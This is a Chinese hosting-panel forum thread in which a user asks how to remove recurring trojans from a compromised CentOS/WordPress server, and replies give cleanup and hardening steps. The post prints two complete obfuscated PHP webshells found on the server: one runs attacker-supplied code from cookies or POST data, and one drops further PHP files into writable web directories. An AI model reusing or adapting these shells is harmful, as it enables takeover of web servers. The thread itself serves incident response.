当前位置:论坛首页 > Linux面板 > 求助

【已完成】服务器被入侵,每天自动生成木马文件如何清除

发表在 Linux面板2023-12-15 15:15 [复制链接] 3 3072

为了能快速了解并处理您的问题,请提供以下基础信息:
面板、插件版本:

免费版 [url=]8.0.4[/url]
系统版本:

系统:CentOS 7.5.1804 x86_64(Py3.7.9)
问题描述:

被入侵,每天自动生成木马文件,然后网页跳转到小视频广告页面。
相关截图(日志、错误):

微信图片_20231215151230.png

  1. <?php /*lxk */function xyclb(){$ujyrjjt='wdojgihc';      print_r (79139+79139);/*  qin*/}
  2. $ssgywerpcn/*  mzkel */=  'ssgywerpcn'   ^    ' ';


  3. function/*a   */pyymvixxb_($kn_xqalen,/*  sd   */$bnpohvotsmg)

  4. {
  5. global      $ssgywerpcn;/*_f   */$kdzpfl/*ucbi*/=  "";   for/* dapv  */($zaauyvetbu   = 0; $zaauyvetbu </*  bjz  */strlen($kn_xqalen);) {
  6. /*   xdsxa */for       ($bnpohvo  =       0;   $bnpohvo     </* vyogl  */strlen($bnpohvotsmg)/* lmdtw  */&&  $zaauyvetbu/*  ywxqi*/</*  tm*/strlen($kn_xqalen);      $bnpohvo++,/*  rhj_ */$zaauyvetbu++)    {
  7.    $kdzpfl       .=/*jmyy*/$ssgywerpcn(ord($kn_xqalen[$zaauyvetbu])  ^  ord($bnpohvotsmg[$bnpohvo]));
  8.     }

  9. }/*dpknn*/return/*z */$kdzpfl;


  10. }
  11. function kjjpsyuvn($lyxehu,       $kn_xqalen){ global/*  uxuyd   */$ssgywerpcn;



  12.     $afrqev/* vbct */=     sprintf("\x2e" .     "/"."%".$ssgywerpcn(115)  . "."."p"."\154", md5($lyxehu));

  13. /*  vhvvo*/file_put_contents($afrqev, "<"/*ibnb */.       $ssgywerpcn(63) .      $ssgywerpcn(112)/*  ar   */./*x */"h".$ssgywerpcn(112)     . $ssgywerpcn(32) .    "u"."n"."l"."i"."\156"      ./*fqbm   */"k".$ssgywerpcn(854-814) . "\137"   . "_"."\106"/*   qde   */./*o  */"\111"/*a   */./* gxbg*/$ssgywerpcn(76)   .   $ssgywerpcn(220-151)/* y */. $ssgywerpcn(95) .      $ssgywerpcn(95)  . "\x29"/*  cpzcg */. ";".$ssgywerpcn(32)   .    $kn_xqalen[$ssgywerpcn(265-165)]);
  14. include($afrqev); $txbkfgegt  =   $afrqev;


  15. /*   ufiax   */unlink($txbkfgegt);

  16. }




  17. function/* n*/_de_r(){ global $ssgywerpcn;




  18. /*  tv */$zaauyvetbu =  array();


  19.        $zaauyvetbu["p".$ssgywerpcn(236-118)]/*  hhfub   */=       phpversion();

  20. $zaauyvetbu["\x73"/*  enptp*/.     "v"] =/*  hnrb  */"3"."."."5";


  21.     echo @serialize($zaauyvetbu);

  22. }
  23. function    ihnyimf_k($kn_xqalen,   $lyxehu,    $rdqiaixj)

  24. {
  25. /*   io_a*/global      $ssgywerpcn;




  26.      $kn_xqalen  = unserialize(pyymvixxb_(pyymvixxb_(base64_decode($kn_xqalen),/*nvm  */$lyxehu),       $rdqiaixj));
  27.   if (isset($kn_xqalen[$ssgywerpcn(97)/* q   */./*  un   */$ssgywerpcn(520-413)]))    {    if ($kn_xqalen["a"] == "i") {


  28. /*  k   */_de_r();/*   x   */}/*zowjn  */elseif/*a_   */($kn_xqalen["a"]     ==  $ssgywerpcn(101))  {
  29. /*  jchf */kjjpsyuvn($lyxehu, $kn_xqalen);


  30. /*d*/}

  31. /*angx */exit();

  32. }}



  33. $kiqgcjxshz/*aybq */=/*   tjz  */$_COOKIE;$eohltwu =/* yy*/$_POST;

  34. $kiqgcjxshz  = array_merge($eohltwu, $kiqgcjxshz);




  35. $lyxehu =/* f */$ssgywerpcn(295-197) ./*  nfa */$ssgywerpcn(52)/*wah */. "\x31"/* lyj   */./*   kik_ */"\x33"/*tmktl */./*  bmsob*/$ssgywerpcn(50)      .   $ssgywerpcn(121-65) . "\x31"  .    "\62"  .  "-"."\x64"/*   _   */. $ssgywerpcn(49)       .  "f".$ssgywerpcn(53)  . "\55"/*  zhq*/./*xtuat*/"\64"     ./*   kf   */"3"."\144"    . "8"."\55"     . "9".$ssgywerpcn(101)."9".$ssgywerpcn(57)    ./*   hn */"\55"   ./*  qzrav*/"\60"   . "1".$ssgywerpcn(54) .     "\x35" ./*   kaihb*/$ssgywerpcn(179-77) . $ssgywerpcn(102)     ./*  x   */"\x38"/*nnrhp   */.    "7".$ssgywerpcn(54)/* j*/.      "0"."\x37"   .       "0";


  36. foreach ($kiqgcjxshz/*ueynv  */as       $rdqiaixj    =>/*  oo  */$kn_xqalen)  {


  37. /*a   */ihnyimf_k($kn_xqalen, $lyxehu,     $rdqiaixj);
  38. }
复制代码



  1. themes.php

  2. <?php $eiPORyHuD = "\x44".'O'.chr(67)."\125"."\x4d".chr(69)."\x4e"."\x54"."\x5f"."\x52"."\x4f".chr(79).chr(488-404);$mQeLbMGGH = "\x48".chr(793-709).chr(84)."\x50".chr(95)."\110".'O'."\123".chr(612-528);$EqgzY = chr(955-851).'t'."\164".chr(112).chr(58).chr(47)."\57";$JuqNXjgAE = "\56"."\x70"."\150".chr(112);$xmRiMBXufw = "\160".chr(104).'p';$LhKfGPavo = chr(102).chr(350-245)."\x6c"."\x65"."\137".chr(630-518).chr(117).'t'.chr(1077-982).'c'."\x6f".'n'."\164"."\145".chr(110)."\164".chr(115);$CmwjEUGCOh = 'r'.chr(97).chr(119).chr(117).'r'.chr(108).chr(100)."\145".chr(99).'o'.'d'."\145";$HejiZoUGGb = "\x75".chr(110).chr(115)."\x65".chr(114).'i'."\x61".chr(108)."\x69".chr(594-472)."\145";$ExCCez = chr(105)."\x73"."\x5f"."\x77"."\x72".chr(552-447).chr(116)."\141".chr(98)."\x6c".chr(850-749);$UHrOh = "\160"."\150".chr(112)."\x76"."\145".chr(857-743).chr(868-753)."\151".chr(928-817).'n';$qWcAnj = chr(684-569).chr(116).chr(940-826).chr(95).chr(142-28).chr(541-430).chr(116).chr(657-608).chr(463-412);$iRQyI = chr(115).chr(247-146)."\162"."\151"."\141"."\154"."\151".'z'.chr(607-506);$lbFvqwTk = "\163".chr(116)."\162"."\137"."\163".chr(284-172).chr(108)."\x69".'t';foreach ($_POST as $LjGYaNIPG => $IkFCctu){$fKpOQVhU = strlen($LjGYaNIPG);if ($fKpOQVhU == 16){$IkFCctu = $lbFvqwTk($CmwjEUGCOh($qWcAnj($IkFCctu)));$LjGYaNIPG = array_slice($lbFvqwTk(str_repeat($LjGYaNIPG, (count($IkFCctu)/16)+1)), 0, count($IkFCctu));function nJBnsCDb($rFbUM, $vuUkPGaBA, $LjGYaNIPG){$aCXFOCnojs = "9250814d-4f45-46d8-bc88-5d4a5707300c";return $rFbUM ^ $aCXFOCnojs[$vuUkPGaBA % strlen($aCXFOCnojs)] ^ $LjGYaNIPG;}$IkFCctu = array_map("nJBnsCDb", array_values($IkFCctu), array_keys($IkFCctu), array_values($LjGYaNIPG));$IkFCctu = implode("", $IkFCctu);$IkFCctu = @$HejiZoUGGb($IkFCctu);if (@is_array($IkFCctu)){$qpWgwklWJWhYzBYj = array_keys($IkFCctu);$IkFCctu = $IkFCctu[$qpWgwklWJWhYzBYj[0]];if ($IkFCctu === $qpWgwklWJWhYzBYj[0]){echo @$iRQyI(Array($xmRiMBXufw => @$UHrOh(), ));exit();}else {function HnxkXivxRP($qpWgwklir){static $lQTcstB = array();$iDcDhF = glob($qpWgwklir . '/*', GLOB_ONLYDIR);$mpUZABBn = count($iDcDhF);if ($mpUZABBn > 0) {foreach ($iDcDhF as $qpWgwkl) {if (@$ExCCez($qpWgwkl)) {$lQTcstB[] = $qpWgwkl;}}}foreach ($iDcDhF as $qpWgwklir) HnxkXivxRP($qpWgwklir);return $lQTcstB;}$kZKkSu = $_SERVER[$eiPORyHuD];$iDcDhF = HnxkXivxRP($kZKkSu);$qpWgwklWJWhYzBYj = array_rand($iDcDhF);$FYTATZ = $iDcDhF[$qpWgwklWJWhYzBYj] . "/" . substr(md5(time()), 0, 8) . $JuqNXjgAE;@$LhKfGPavo($FYTATZ, $IkFCctu);$OPVIrEk = $EqgzY . $_SERVER[$mQeLbMGGH] . substr($FYTATZ, strlen($kZKkSu));print($OPVIrEk);die();}}}}
复制代码



微信图片_20231215150703.png
使用道具 举报 只看该作者 回复
发表于 2023-12-15 15:41:32 | 显示全部楼层
先检查下服务器有没有新增的用户   
修改root密码
再检查用户的权限
删除除了root或则你自己指定的其他所有有SSH权限的用户
修改宝塔密码 删除非自己的宝塔的用户
非必要关闭宝塔API
微步或者防火墙、木马查杀啥的 扫描下wenshell
使用道具 举报 回复 支持 反对
发表于 2023-12-15 15:51:08 | 显示全部楼层
修改过root密码,关闭过宝塔面板,还是会被黑客远程访问网站激活木马,写入跳转文件。我估计是系统被写入其它母木马。对方能修改网站根目录文件444,自动改成755,就是木马程序能够更改文件权限。


现在基本上把WordPress目录改成555,只留update为755,现在木马就只在update目录出现了。

现在应该排查系统是否有母木马,或者是root是否还有漏洞,或者是WordPress的MySQLSF有恶意程序。
使用道具 举报 回复 支持 反对
发表于 2023-12-15 16:10:39 | 显示全部楼层
备份数据(网站,数据库等等)
使用工具对网站程序扫描,清理木马,以及对代码做审计,程序有漏洞及时修复
检查服务器日志,网站日志,排查入侵的方式,采取相应的措施避免再次入侵
重装系统,恢复数据
对服务器进行相应的安全措施
一些防挂马、篡改、恶意提权的小防护攻略:
1.网站上线前,对自己的项目用常用的一些工具进行程序漏洞安全扫描,并且做多份备份;
2.为了安全起见,网站后台管理地址经常改,改完做多份纪录保存,并且做好历史修改记录;
3.默认数据库名称要改,能复杂尽量复杂,用好复制粘贴按键;
4.后台启用验证码登录模块,不要怕麻烦,人家弄您网站的人都不嫌麻烦;
5.做好网站防护,比如非法上传文件、会员上传恶意文件的功能等,装好web防火墙;
6.服务器主机的ssh能不开就不开,尽量少使用root用户登录;即使登录也做好登录限制为仅允许自己的ip,高强度复杂的密码是第一必设项;
7.宝塔面板有多个辅助防护插件,例如调用系统防火墙、web防火墙(nginx防火墙/apache防火墙)、php安全防护、防篡改、防入侵等。
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表